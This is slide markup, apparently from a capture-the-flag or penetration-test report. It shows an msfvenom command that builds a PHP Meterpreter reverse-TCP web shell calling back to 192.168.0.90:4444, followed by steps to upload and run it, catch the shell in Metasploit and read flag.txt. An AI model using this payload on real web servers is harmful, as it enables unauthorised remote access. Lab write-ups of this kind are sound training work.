              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>LHOST=192.168.0.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>LPORT=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Use the Kali File Manager to upload the payload onto the webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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37" name="Google Shape;1137;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;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40" name="Google Shape;1140;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1" name="Google Shape;1141;p63"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3513796" y="1439756"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created the shell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Upload the shell.php to the Webserver using the Kali file manager.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Execute the script on the webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Establish the listenner in metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Established the connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Successfully established connection to the webserver as seen in image top right.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1144" name="Google Shape;1144;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45" name="Google Shape;1145;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1146;p63"/>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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408670" y="1481374"/>
            <a:ext cx="23715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endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D7886F-C6E9-5895-78D0-AE3121D18359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418921" y="1480575"/>
            <a:ext cx="2393008" cy="1409977"/>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067C680C-E7D4-4849-2585-E5FB9F9931F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401176" y="2906959"/>
            <a:ext cx="2428500" cy="1934438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3730028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Exploitation: [Shell access to the web server]</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p6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33" name="Google Shape;1133;p63"/>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3"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Tools &amp; Processes</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse shell established in previous slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Using a Metasploit shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Search for the flag and confirm with client as successful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find / -name flag 2&gt;/dev/null</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat flag.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1136" name="Google Shape;1136;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37" name="Google Shape;1137;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1139" name="Google Shape;1139;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40" name="Google Shape;1140;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1" name="Google Shape;1141;p63"/>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3"/>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000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Compromised Apache server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Established shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Found t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> flag.txt file and captured the flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1000" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
